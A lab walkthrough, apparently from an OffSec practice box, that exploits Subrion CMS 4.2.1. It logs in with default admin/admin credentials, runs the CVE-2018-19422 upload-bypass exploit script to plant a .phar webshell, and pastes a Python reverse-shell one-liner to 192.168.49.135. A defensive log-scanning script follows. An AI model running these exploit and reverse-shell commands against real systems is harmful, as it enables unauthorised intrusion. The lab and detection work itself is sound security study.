Subrion 4.2.1

Check the admin panel for default credentials (admin / admin worked here), then use the following exploit to get a webshell.

python3 /usr/share/exploitdb/exploits/php/webapps/49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: DDfwZ8GPEC2Tg8VVe1YRcFpRjJa9FYyVqFKUT1w8
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: opeiofhyesciqss

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/opeiofhyesciqss.phar 

$ export RHOST="192.168.49.135";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

$ ^C
[x] Failed to execute PHP code...
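
A detection-side view of the upload shown above, as an added example that is not part of the original notes: it scans access-log lines for requests that reach a PHP-executable file name under the uploads directory. The combined log format, the extension set beyond `.phar`, and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

UPLOAD_PREFIX = "/panel/uploads/"  # directory shown in the exploit output
# .phar is the extension used on this page; the rest of the set is an
# assumption to adjust to what the server's PHP handler is mapped to.
PHP_EXEC_EXT = {"php", "php5", "phtml", "pht", "phar"}

# Apache/nginx "combined" access-log format (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def suspicious_upload_hits(lines):
    """Return one dict per request for a PHP-executable name under uploads."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode %xx and drop the query string before inspecting the name.
        path = unquote(urlsplit(m["target"]).path).lower()
        if not path.startswith(UPLOAD_PREFIX):
            continue
        name = path.rsplit("/", 1)[-1]
        # Look at every extension, not only the last: with multi-extension
        # handler mappings "x.php.jpg" can still be executed.
        if PHP_EXEC_EXT.intersection(name.split(".")[1:]):
            hits.append({
                "ip": m["ip"], "time": m["ts"], "method": m["method"],
                "path": path, "served": m["status"].startswith("2"),
            })
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:30 +0000] "GET /panel/ HTTP/1.1" 200 4120 "-" "python-requests/2.25.1"',
    '198.51.100.4 - - [10/Oct/2023:13:55:31 +0000] "GET /panel/uploads/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /panel/uploads/opeiofhyesciqss.phar HTTP/1.1" 200 31 "-" "python-requests/2.25.1"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /panel/uploads/old%2Epht?x=1 HTTP/1.1" 404 196 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in suspicious_upload_hits(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to true means the server answered the request for that file with a 2xx status, which is the case to triage first.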
